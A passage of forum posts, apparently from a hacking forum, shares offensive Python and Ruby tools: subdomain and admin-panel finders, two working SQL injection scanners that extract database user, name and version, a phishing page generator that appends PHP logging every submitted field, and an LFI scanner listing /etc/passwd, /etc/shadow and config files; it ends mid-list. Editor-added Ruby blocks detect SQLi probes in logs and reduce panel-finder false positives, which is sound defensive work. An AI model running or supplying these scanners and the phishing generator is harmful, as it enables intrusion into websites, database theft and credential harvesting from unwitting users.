    print "\n[+] Webs Found : ",len(pages),"\n"
    sql(pages)

copyright()
#380
Python / [Python] Fuzz DNS By Doddy H
July 03, 2011, 09:34:47 PM
Hello everyone.

Here I leave you a simple DNS finder; you just enter the domain and this little thing takes care of finding them.

Code: python

#!/usr/bin/python
#Fuzz DNS (C) Doddy Hackman

import os,sys,urllib2,re

dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc']

def header() :
    print "\n--== Fuzz DNS ==--\n"

def copyright() :
    print "\n\n(C) Doddy Hackman 2010\n"
    exit(1)

def show() :
    print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
    return urllib2.urlopen(web).read()


def search(web):
    print "\n[+] Searching DNS in",web,"\n"
    for d in dns:
        # one try per name: a host that does not answer must not end the whole search
        try:
            toma("http://"+d+"."+web)
            print "[DNS Link] : http://"+d+"."+web
        except:
            pass

header()

if len(sys.argv) != 2 :
    show()

else :
    search(sys.argv[1])

copyright()


#The End



Usage example


Code: text

C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com


--== Fuzz DNS ==--


[+] Searching DNS in google.com

[DNS Link] : http://www.google.com

(C) Doddy Hackman 2010





#381
Python / [Python] FTP Manager
July 03, 2011, 09:34:36 PM
Hello

Here's a simple FTP client

Code: python

#!/usr/bin/python
#FTP Manager 0.2 (C) Doddy Hackman 2011

from ftplib import FTP
import sys


def head():
    print "\n -- == FTP Manger == --\n\n"

def copyright():
    print "\n\n(C) Doddy Hackman 2011\n"
    sys.exit(1)

def show():
    print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n"

def menu():
    print "\n"
    print "1 : dir"
    print "2 : cwd"
    print "3 : chdir"
    print "4 : delete dir"
    print "5 : delete file"
    print "6 : rename file"
    print "7 : make directory"
    print "8 : size"
    print "9 : abort\n\n"
    op = input("[Option] : ")
    return op


def enter(host,user,password):
    print "[+] Connecting to ",host,"\n"
    ftp = FTP(host,user,password)   # the connection the nested menu2() works on
    print "\n[+] Enter in the system\n"

    def menu2():
        op = menu()
        if op == 1:
            try:
                ftp.dir()   # dir() prints the listing itself and returns None
                menu2()
            except:
                menu2()
        elif op == 2:
            try:
                print "\n\n[+] Path : "+ftp.pwd()+"\n\n"
                menu2()
            except:
                menu2()
        elif op == 3:
            try:
                dir = raw_input("\n\n[Directory] : ")
                ftp.cwd(dir)
                print "\n\n[+] Directory Changed\n\n"
                menu2()
            except:
                menu2()
        elif op == 4:
            try:
                dir = raw_input("\n\n[Directory] : ")
                ftp.rmd(dir)
                print "\n\n[+] Directory Deleted\n\n"
                menu2()
            except:
                menu2()
        elif op == 5:
            try:
                file = raw_input("\n\n[File] : ")
                ftp.delete(file)
                print "\n\n[+] File Deleted\n\n"
                menu2()
            except:
                menu2()
        elif op == 6:
            try:
                oldfile = raw_input("\n\n[Name] : ")
                newfile = raw_input("\n[New Name] : ")
                ftp.rename(oldfile,newfile)
                print "\n\n[+] Name Changed\n\n"
                menu2()
            except:
                menu2()
        elif op == 7:
            try:
                dir = raw_input("\n\n[New Directory] : ")
                ftp.mkd(dir)
                print "\n\n[+] Directory Created\n\n"
                menu2()
            except:
                menu2()
        elif op == 8:
            try:
                file = raw_input("\n\n[File] : ")
                peso = ftp.size(file)   # SIZE replies in bytes
                print "\n\n[+] ",peso," bytes \n\n"
                menu2()
            except:
                menu2()
        elif op == 9:
            ftp.quit()
            copyright()

        else:
            menu2()
    menu2()



head()

if len(sys.argv) != 4:
    show()
else:
    enter(sys.argv[1],sys.argv[2],sys.argv[3])

copyright()

#382
Python / [Python] Finder Admin By Doddy H
July 03, 2011, 09:34:25 PM
Hello everyone.

Today I finished a Python script to find the famous administration panel

Code: python

#!/usr/bin/python
#Finder Admin (C) Doddy Hackman

import sys,httplib,os

os.system("cls")

panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']

import sys
import httplib  # Python 2 module (http.client in Python 3)

def header():
    print "\n--== Finder Admin ==--\n"

def copyright():
    print "\n\n(C) Doddy Hackman 2010\n"
    sys.exit(1)

def show():
    print "\n[*] Sintax : ", sys.argv[0], " <web>\n"

def toma(web, path):
    # Plain HTTP request for the candidate path; only the status code is used
    nave = httplib.HTTPConnection(web)
    nave.request("GET", "/" + path)
    return nave.getresponse().status

def buscar(web):
    print "\n[+] Target : ", web, "\n\n"
    for path in panels:
        try:
            code = toma(web, path)
            if code == 200:
                print "[Link] : " + web + "/" + path
        except KeyboardInterrupt:
            copyright()
        except Exception:
            # a failed request for one path must not stop the scan
            pass

header()

if len(sys.argv) != 2:
    show()
else:
    buscar(sys.argv[1])

copyright()


#The End


An example of use would be

Code: text

python finder.py 127.0.0.1


Code: text

--== Finder Admin ==--


[+] Target :  127.0.0.1


[Link] : 127.0.0.1/admin/
[Link] : 127.0.0.1/login.php
[Link] : 127.0.0.1/phpmyadmin/


(C) Doddy Hackman 2010


Oh, and don't use http:// in the site you want to scan.

#383
Python / [Python] Easy Inyector By Doddy H
July 03, 2011, 09:34:16 PM
Well, this is the first version of this simple program I made in perl; in
the next version I will add other things and it will be able to scan several from a text file.

This thing looks for:

* Vulnerability (obviously)
* Column limit
* Information about the database
* Automatically finds the number that prints information
* Checks the existence of mysql.user and information_schema.tables



Code: python

#!usr/bin/python
#Easy Inyector (C) Doddy Hackman 2010
# Python 2 (urllib2)

import os, sys, urllib2, re


def clean():
    if sys.platform == "win32":
        os.system("cls")
    else:
        os.system("clear")


def header():
    print "\n--== Easy Inyector ==--\n"

def copyright():
    print "\n\n(C) Doddy Hackman 2010\n"
    sys.exit(1)

def show():
    print "\n[*] Sintax : ", sys.argv[0], " <web>\n"

def toma(web):
    return urllib2.urlopen(web).read()

def bypass(bypass):
    # Space and comment substitutes: "+"/"--" by default, "/**/" and "/*" as the alternative
    if bypass == "--":
        return ("+", "--")
    elif bypass == "/*":
        return ("/**/", "/*")
    else:
        return ("+", "--")

def more(web, passx):
    pass1, pass2 = bypass(passx)
    print "\n[+] Searching more data\n"
    # 0x334d50335a3452 = "3MP3Z4R" and 0x4b30425241 = "K0BRA" delimit the values inside the page
    web1 = re.sub("hackman", "concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)", web)
    code0 = toma(web1)
    if re.findall("3MP3Z4R(.*?)3MP3Z4R", code0):
        datax = re.findall("3MP3Z4R(.*?)3MP3Z4R", code0)
        datar = re.split("K0BRA", datax[0])
        print "[+] Username :", datar[1]
        print "[+] Database :", datar[2]
        print "[+] Version :", datar[3], "\n"
    code1 = toma(web1 + pass1 + "from" + pass1 + "mysql.user" + pass2)
    if re.findall("K0BRA", code1):
        print "[+] mysql.user : on"
    code2 = toma(web1 + pass1 + "from" + pass1 + "information_schema.tables" + pass2)
    if re.findall("K0BRA", code2):
        print "[+] information_schema.tables : on"

def findlength(web, passx):
    pass1, pass2 = bypass(passx)
    print "\n[+] Finding columns length"
    # Add one marked column per round until the page echoes one of the markers
    number = "concat(0x4b30425241,1,0x4b30425241)"
    for te in range(2, 30):
        number = number + "," + "concat(0x4b30425241," + str(te) + ",0x4b30425241)"
        code = toma(web + "-1" + pass1 + "union" + pass1 + "select" + pass1 + number + pass2)
        if re.findall("K0BRA(.*?)K0BRA", code):
            numbers = re.findall("K0BRA(.*?)K0BRA", code)
            print "[+] Column length :", te
            print "[+] Numbers", numbers, "print data"
            # Build "1,2,...,te" and swap only the first printing column (whole token) for the placeholder
            sqli = ",".join(str(n) for n in range(1, te + 1))
            sqla = re.sub(r"\b" + numbers[0] + r"\b", "hackman", sqli, 1)
            more(web + "-1" + pass1 + "union" + pass1 + "select" + pass1 + sqla, passx)
            print "\n[+] Scan Finished\n"
            sys.exit(1)
    print "[-] Length dont found\n"


def scan(web, passx):
    pass1, pass2 = bypass(passx)
    print "\n[+] Testing vulnerability"
    code = toma(web + "-1" + pass1 + "union" + pass1 + "select" + pass1 + "1" + pass2)
    if re.findall("The used SELECT statements have a different number of columns", code, re.I):
        print "[+] SQLI Detected"
        findlength(web, passx)
    else:
        print "[-] Not Vulnerable"
        copyright()


header()

if len(sys.argv) != 2:
    show()
else:
    try:
        scan(sys.argv[1], "--")
    except Exception:
        # any network or parsing error ends the run; SystemExit passes through
        copyright()


#The End





Example of use

Code: text


C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=


--== Easy Inyector ==--


[+] Testing vulnerability
[+] SQLI Detected

[+] Finding columns length
[+] Column length : 3
[+] Numbers ['1', '2', '3'] print data

[+] Searching more data

[+] Username : root@localhost
[+] Database : hackman
[+] Version : 5.1.41

[+] mysql.user : on
[+] information_schema.tables : on

[+] Scan Finished



(C) Doddy Hackman 2010




#384
Python / [Python] Console By Doddy H
July 03, 2011, 09:34:00 PM
Well, this is a simple command runner made in tk

Code: python

#!usr/bin/python
#Console (C) Doddy Hackman 2011
# Python 2 (Tkinter)

from Tkinter import *
import subprocess


def execa():
    # Run the typed command through the shell; show its stdout, or stderr if it failed
    proc = subprocess.Popen(cmd.get(), shell=True, stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = proc.communicate()
    if proc.returncode == 0:
        panel.insert(END, out)
    else:
        panel.insert(END, err or out)


window = Tk()
window.title("Console (C) Doddy Hackman 2011")

window.maxsize(width="400", height="320")
window.minsize(width="400", height="320")

window.configure(background="black")
window.configure(cursor="tcross")

cmd = StringVar()
panel = Text(window, width=30, height=15, bg="black", fg="green")

Label(window, bg="black").grid(row=1)
Label(window, text="Command : ", bg="black", fg="green").grid(row=3, column=4)

entry = Entry(window, width=35, textvariable=cmd, bg="black", fg="green")
entry.grid(row=3, column=5)

Button(text="Cargar", bg="black", fg="green", activebackground="green", command=execa).grid(row=3, column=9)


Label(window, bg="black").grid(row=4)
panel.grid(row=10, column=5)


window.mainloop()


#385
Ruby / [Ruby] SQLI Scanner
July 03, 2011, 09:33:07 PM
An SQLI scanner in ruby

Code: ruby

#!usr/bin/ruby
#SQLI Scanner (C) Doddy Hackman 2010
#contact me : doddy-hackman.blogspot.com

require 'net/http'
require 'uri'


def uso
  print "\n[+] sqli.rb <site>\n"
end

def toma(host,path)
  http = Net::HTTP.new(host,80)
  return http.get(path).body
end

def details(web,more)
  # 0x4b30425241 decodes to "K0BRA"; it delimits the values inside the page
  web1 = more.sub(/hackman/,"0x4b30425241")
  more = more.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  print "\n\n[+] Extracting information of the DB\n\n"
  url = URI.parse(web)
  code = toma(url.host,url.path+"?"+url.query+more)
  if code=~/K0BRA(.*?)K0BRA(.*?)K0BRA(.*?)K0BRA/
    print "[username] : "+$1+"\n"
    print "[database] : "+$2+"\n"
    print "[version] : "+$3+"\n\n"

    test1 = toma(url.host,url.path+"?"+url.query+web1+"+from+information_schema.tables")
    test2 = toma(url.host,url.path+"?"+url.query+web1+"+from+mysql.user")

    if test1=~/K0BRA/
      print "[information_schema.tables] : ON\n"
    end

    if test2=~/K0BRA/
      print "[mysql.user] : ON"
    end
  else
    print "\n[-] Not Found\n\n"
  end
end


def scan(web)
  print "\n[+] Testing the vulnerability SQLI...\n\n"
  url = URI.parse(web)
  codetest = toma(url.host,url.path+"?"+url.query+"-1+union+select+1")
  if codetest=~/The used SELECT statements have a different number of columns/
    print "[+] SQLI Detected\n\n"
  else
    print "[-] Not Vulnerable to SQLI\n\n"
    copyright()
  end

  # Add one marked column per round until the page echoes one of the markers
  z = "1"
  x = "concat(0x4b30425241,1,0x4b30425241)"
  for num in (2..25)
    z = z+","+num.to_s
    x = x+","+"concat(0x4b30425241,"+num.to_s+",0x4b30425241)"
    code = toma(url.host,url.path+"?"+url.query+"-1+union+select+"+x)
    if code=~/K0BRA(.*?)K0BRA/
      col = $1
      print "[+] The Page has "+num.to_s+" columns\n"
      print "[+] The number "+col+" print data\n\n"
      # Replace only that column number (as a whole token) with the placeholder
      z = z.sub(/\b#{col}\b/,"hackman")
      print "[SQLI] : "+web+"-1+union+select+"+z
      details(web,"-1+union+select+"+z)
      copyright()
    end
  end
  print "\n\n[-] Not Found the numbers of the columns\n\n"
  copyright()
end

def head()
  print "\n\n -- == SQLI Scanner == --\n\n"
end

def copyright()
  print "\n\n\n(C) Doddy Hackman 2010\n\n"
  exit(1)
end

head()
if !ARGV[0]
  uso()
else
  scan(ARGV[0])
  copyright()
end
copyright()

#The End ?
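
The two SQLi scanners on this page (the Python Easy Inyector above and this Ruby one) are noisy: the UNION SELECT probe, the hex-encoded markers (0x4b30425241 is "K0BRA", 0x334d50335a3452 is "3MP3Z4R") and the mysql.user / information_schema checks all travel in the query string and end up in the web server's access log. The following is an added example by the editor, not code from the original posts, showing how to flag those probes in combined-format access-log lines. The log lines are constructed for the example (no real server produced them), and the indicator list and threshold are the editor's choices.

```ruby
require 'cgi'

# Apache combined-format lines constructed for this example; no real server
# produced them. The first three are what Easy Inyector / SQLI Scanner send,
# the last two are ordinary traffic (one of them has the words "union select"
# in a headline).
SAMPLE_LOG = [
  '10.0.0.5 - - [03/Jul/2011:21:34:16 -0300] "GET /sql.php?id=-1+union+select+1-- HTTP/1.1" 200 512 "-" "Python-urllib/2.6"',
  '10.0.0.5 - - [03/Jul/2011:21:34:17 -0300] "GET /sql.php?id=-1+union+select+concat(0x4b30425241,1,0x4b30425241),concat(0x4b30425241,2,0x4b30425241)-- HTTP/1.1" 200 640 "-" "Python-urllib/2.6"',
  '10.0.0.5 - - [03/Jul/2011:21:34:18 -0300] "GET /sql.php?id=-1/**/union/**/select/**/1,hackman,3/**/from/**/mysql.user/* HTTP/1.1" 200 700 "-" "Ruby"',
  '192.168.1.9 - - [03/Jul/2011:21:35:02 -0300] "GET /sql.php?id=42 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
  '192.168.1.9 - - [03/Jul/2011:21:35:03 -0300] "GET /news.php?title=Union+Select+Committee HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

# 0x4b30425241 decodes to "K0BRA" and 0x334d50335a3452 to "3MP3Z4R": the
# delimiters both scanners wrap extracted values in.
INDICATORS = {
  union_select: /\bunion\s+(?:all\s+)?select\b/i,
  comment_tail: /(?:--|#|\/\*)\s*\z/,
  hex_literal:  /\b0x[0-9a-f]{6,}\b/i,
  schema_probe: /\b(?:information_schema\.|mysql\.user)\b/i,
  concat_call:  /\bconcat\s*\(/i,
}

# Request target out of a combined-format line, or nil if the line does not parse.
def request_target(line)
  m = line.match(/"(?:GET|POST|HEAD) (\S+) HTTP\/\d\.\d"/)
  m && m[1]
end

# Undo the encodings the scanners use to dodge naive filters: percent-encoding,
# '+' for space and the '/**/' comment used as a space.
def normalize(target)
  CGI.unescape(target).gsub(%r{/\*\*/}, ' ')
end

# Names of the indicators that fire on one request target.
def sqli_indicators(target)
  text = normalize(target)
  INDICATORS.select { |_, re| text =~ re }.keys
end

# One indicator alone is weak evidence (a headline can contain "union select"),
# so a request is reported only when at least `threshold` indicators fire.
def analyze_log(lines, threshold: 2)
  lines.each_with_object([]) do |line, hits|
    target = request_target(line) or next
    fired = sqli_indicators(target)
    next if fired.size < threshold
    hits << { target: target, indicators: fired }
  end
end

if __FILE__ == $0
  analyze_log(SAMPLE_LOG).each do |h|
    puts "[probe] #{h[:target]}  (#{h[:indicators].join(', ')})"
  end
end
```

Run against the constructed lines it reports the three scanner requests and stays quiet on the two legitimate ones; the threshold of two indicators is what keeps the "Union Select Committee" headline out of the alerts.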
#386
Ruby / [Ruby] Phishing Gen
July 03, 2011, 09:32:52 PM
A fake-page generator

Code: ruby

#!usr/bin/ruby
#PHishing Gen (C) Doddy Hackman 2010
#contact me : doddy-hackman.blogspot.com

require 'net/http'
require 'uri'

def uso
  print "\n[+] fake.rb <site> <result>\n"
end

def toma(web)
  return Net::HTTP.get(web)
end

def savefile(filename,text)
  # append to the output file and close it
  File.open(filename,'a') do |files|
    files.puts text
  end
end

def gen(web,file,magic)
  print "\n\n[+] Getting the source...\n"
  code = toma(URI.parse(web))
  savefile(file,code+"\n"+magic)
  print "[+] Finish"
  copyright()
end

def head()
  print "\n\n -- == Phising Gen == --\n\n"
end

def copyright()
  print "\n\n\n(C) Doddy Hackman 2010\n\n"
  exit(1)
end

head()
if !ARGV[0] or !ARGV[1]
  uso()
else
  # PHP appended to the copied page: it writes every POST/GET field to dump.txt
  text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>'
  gen(ARGV[0],ARGV[1],text)
end
copyright()

#387
Ruby / [Ruby] Panel Control
July 03, 2011, 09:32:42 PM
An admin panel finder

Code: ruby

#!usr/bin/ruby
#Panel cONTROL (C) Doddy Hackman 2010
#contact me : doddy-hackman.blogspot.com

require 'net/http'
require 'uri'

panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']


def uso
  print "\n[+] panelcontol.rb <site>\n"
end

def toma(web)
  return Net::HTTP.get_response(web)
end


def scan(web,panels)
  print "\n[+] Starting the scan...\n\n\n"
  panels.each do |panel|
    begin
      code = toma(URI.parse(web+"/"+panel))
    rescue
      # a failed request for one path must not end the whole scan
      next
    end
    case code
    when Net::HTTPSuccess
      print "[Link] : "+web+"/"+panel+"\n"
    end
  end
end

def head()
  print "\n\n -- == Panel Control == --\n\n"
end

def copyright()
  print "\n\n\n(C) Doddy Hackman 2010\n\n"
  exit(1)
end

head()
if !ARGV[0]
  uso()
else
  scan(ARGV[0],panels)
end
copyright()
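
Both panel finders on this page (the Python Finder Admin above and this Ruby one) report any path that answers 200, so a host with a catch-all route or a "friendly" not-found page served with status 200 makes the whole list look found. The following is an added example by the editor, not code from the original posts: it first requests a path that cannot exist to learn the server's default answer, then reports only candidates whose response differs from that baseline. The fetch function is injected and fake_site is a constructed stand-in for a server; against a real host you would pass a lambda that wraps Net::HTTP.get_response and returns [status, body].

```ruby
require 'digest'
require 'securerandom'

# Constructed stand-in for a web server (not a real host). Only 'admin/' and
# 'phpmyadmin/' exist; with catch_all the server answers every other path with
# the same 200 "friendly" page (plus a changing reference number), which a
# status-only check mistakes for a hit.
def fake_site(catch_all: true)
  real = {
    'admin/'      => '<h1>Administrator login</h1><form>...</form>',
    'phpmyadmin/' => '<title>phpMyAdmin</title>',
  }
  lambda do |path|
    if real.key?(path)
      [200, real[path]]
    elsif catch_all
      [200, "Sorry, that page was not found. Reference #{rand(100_000)}"]
    else
      [404, 'Not Found']
    end
  end
end

# Status plus a digest of the body with digit runs removed, so pages that only
# differ by a counter, timestamp or request id still compare equal.
def fingerprint(status, body)
  [status, Digest::SHA256.hexdigest(body.gsub(/\d+/, ''))]
end

# Ask for a path that cannot exist and remember how the server answers it.
def baseline(fetch)
  status, body = fetch.call("#{SecureRandom.hex(8)}/")
  fingerprint(status, body)
end

# Keep a candidate only if it answers 200 AND looks different from the baseline.
def find_panels(paths, fetch)
  base = baseline(fetch)
  paths.select do |path|
    status, body = fetch.call(path)
    status == 200 && fingerprint(status, body) != base
  end
end

# A few candidates taken from the list above; the real lists are much longer.
PANELS = %w[admin/ login.php administrator/ phpmyadmin/ cpanel/ wp-admin/]

if __FILE__ == $0
  fetch = fake_site(catch_all: true)
  puts "status-only:   #{PANELS.select { |p| fetch.call(p)[0] == 200 }.inspect}"
  puts "with baseline: #{find_panels(PANELS, fetch).inspect}"
end
```

On the constructed catch-all host the status-only check lists all six candidates while the baseline comparison keeps only the two that really exist; on a host that answers 404 properly both approaches agree.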

#388
Ruby / [Ruby] LFI T00l
July 03, 2011, 09:32:22 PM
An LFI scanner

Code: ruby

#!usr/bin/ruby
#LFI tool (C) Doddy Hackman 2010
#contact me : doddy-hackman.blogspot.com

require 'net/http'
require 'uri'


def uso
  print "\n[+] lfi.rb <site>\n"
end

def toma(host,path)
  http = Net::HTTP.new(host,80)
  return http.get(path).body
end

def fuzz(web)
  files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/ac